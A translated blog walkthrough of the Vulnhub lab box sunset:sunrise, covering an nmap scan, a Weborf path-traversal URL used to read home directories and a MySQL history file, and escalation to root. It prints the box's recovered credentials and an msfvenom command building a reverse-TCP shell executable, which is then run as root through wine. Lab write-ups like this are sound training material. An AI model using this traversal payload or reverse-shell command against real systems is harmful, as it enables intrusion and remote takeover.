
Vulnhub box: sunsetsunrise

鸿鹄实验室
Published 2021-04-15 13:12:45

If you don't study when young, you will know nothing when old.


Hello everyone, I'm lengyi, the guy who likes hacking boxes, and I'm back. sunset: sunrise is a medium-difficulty box on Vulnhub; the full description is at https://www.vulnhub.com/entry/sunset-sunrise,406/.

The main topics covered are:

• Asset discovery
• Directory traversal
• Vulnerability exploitation
• MySQL abuse
• Privilege escalation

Enough talk, let's start the pentest.

Reconnaissance

First, use nmap's -sP ping scan for host discovery; the target turns out to be 192.168.0.103. You could also use netdiscover or a similar tool.

Browsing to that internal address shows only a static page, with no hints at all (sometimes the page source contains a hint):

So I ran a fuller nmap scan:

nmap -A  -sS -sV -Pn -T4 -p- --script=vuln 192.168.0.103
╰─#  nmap -A  -sS -sV -Pn -T4 -p- --script=vuln 192.168.0.103                                              148 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 16:48 CST
Nmap scan report for 192.168.0.103
Host is up (0.00055s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-10097  6.0     https://vulners.com/cve/CVE-2019-10097
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-0215   6.0     https://vulners.com/cve/CVE-2019-0215
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|_      CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
3306/tcp open  mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSVersionBindReqTCP, NULL: 
|_    Host '192.168.0.104' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum: 
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: B4:6B:FC:47:AD:60 (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.0.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds

The nmap scan shows that the target has ports 22, 80, 3306 and 8080 open. Port 8080 runs a web service that seems to allow file reads, so let's visit port 8080.

What we find is:

Generated by Weborf/0.12.2 (GNU/Linux)

A search turned up the basic information about this web server (https://www.oschina.net/p/weborf), but nmap did not give a concrete payload, so we use Kali's built-in searchsploit to look up vulnerabilities for this server:

searchsploit  Weborf 0.12.2

View the exploit:

 cat /usr/share/exploitdb/exploits/linux/remote/14925.txt

The read succeeds. Actually the path nmap reported works too; I had just forgotten to URL-encode it...

Going by the box's name, sunset-sunrise, we can try reading those two directories under /home; sunrise turned out to have something in it.

http://192.168.0.103:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
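As an added example (not from the original post, and not Weborf's code), here is the mitigation side of what the scan flagged: a naive check that looks for a literal `../` before decoding misses the `..%2f` form used above, while decoding first and deciding containment on the canonical path catches it. The document root is an assumption.

```python
import os
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"   # assumed document root, not taken from the target

def naive_is_traversal(raw_path):
    """The kind of check a percent-encoded request slips past:
    it looks for a literal '../' in the raw request before decoding."""
    return "../" in raw_path

def robust_is_traversal(raw_path):
    """Decode first (twice, to also catch %252f double encoding), then look for
    a '..' path segment with either separator. Usable for log triage as well."""
    decoded = unquote(unquote(raw_path))
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments

def safe_resolve(doc_root, raw_path):
    """Map a request path to a file under doc_root; return None if the canonical
    path escapes the root. Containment is decided on the normalised absolute
    path, never on the raw string."""
    decoded = unquote(unquote(raw_path))
    root = os.path.normpath(doc_root)
    full = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + os.sep):
        return None
    return full

# Constructed samples: the encoded path from the walkthrough and a benign one.
ENCODED = "//..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f"
PLAIN = "/html/index.html"

if __name__ == "__main__":
    for p in (ENCODED, PLAIN):
        print(p, naive_is_traversal(p), robust_is_traversal(p), safe_resolve(DOC_ROOT, p))
```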

The rest is straightforward: user.txt must have something in it. Sure enough, we get a string of ciphertext, a6050aecf6303b0b824038807d823a89. I tried to decrypt it and couldn't, so I asked the author, who said it is one of the flags. Fine, carry on...

Using the same method we find that /home also has a weborf directory. Browsing it level by level by hand is too slow, so I brute-forced it with a directory scanner. One note: I tried dirsearch and others, but none of them could scan URLs of this form and they all failed; dirb, however, could.

We find a sensitive MySQL file, so let's open it:

http://192.168.0.103:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

Getting a shell

This gives us a username and password, and we connect successfully over SSH.

weborf
iheartrainbows44
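Added example, not part of the original post: a defender-side check for what made this step possible, namely history files in home directories that other users can read or that contain password-bearing statements. The directory layout and the CREATE USER line are constructed for the demo.

```python
import re
import stat
import tempfile
from pathlib import Path

# History files the MySQL/MariaDB client and shells write; the walkthrough
# found the credentials in weborf's ~/.mysql_history.
HISTORY_FILES = (".mysql_history", ".bash_history", ".psql_history")

# Statements that embed a plaintext secret. Newer mysql clients skip logging
# these, but older clients and files that already exist still carry them.
SECRET_PATTERNS = tuple(re.compile(p, re.IGNORECASE) for p in (
    r"identified\s+by\s+'", r"\bpassword\s*\(", r"\bset\s+password\b"))

def find_leaky_history(home_root):
    """Check every home directory under home_root and report history files that
    are readable by group/others or that contain a password-bearing statement.
    Returns a list of (path, reason) tuples."""
    findings = []
    for home in Path(home_root).iterdir():
        for name in HISTORY_FILES:
            hist = home / name
            if not home.is_dir() or not hist.is_file():
                continue
            mode = stat.S_IMODE(hist.stat().st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((str(hist), "readable by group/others"))
            with open(hist, errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if any(p.search(line) for p in SECRET_PATTERNS):
                        findings.append((str(hist), f"password statement on line {lineno}"))
                        break
    return findings

def demo():
    """Constructed sample (not the real box): a home directory holding a
    world-readable .mysql_history with a made-up CREATE USER statement."""
    root = Path(tempfile.mkdtemp())
    home = root / "weborf"
    home.mkdir()
    hist = home / ".mysql_history"
    hist.write_text("show databases;\n"
                    "create user 'weborf'@'localhost' identified by 'EXAMPLE_PW';\n")
    hist.chmod(0o644)
    return find_leaky_history(root)

if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Setting MYSQL_HISTFILE=/dev/null (or pointing ~/.mysql_history at /dev/null) stops the client from writing the file at all.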

Privilege escalation

Since this account came out of the MySQL history, we log into MySQL to see whether we can find root's password:

Cracking root's hash gives purplerain54732, and logging in directly as root gets us root.

When the password cannot be cracked, there is another way to escalate: there is also a sunrise user, so we try logging in as that user.

This gives us a hint: the user can run wine as root. wine needs no introduction, it runs Windows programs on Linux. So the idea is: generate an exe, and run it through wine with root privileges to get root.

Generate the exe with the following command:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=ip LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/html/winbin.exe

Then start a web server with python or apache, download the payload onto the target and execute it.

We get root, and find root.txt under /root for the flag.

The images were hosted on Anquanke's image host, so they got double-watermarked. Scary...

Originally published 2020-01-14 on the 鸿鹄实验室 WeChat public account.
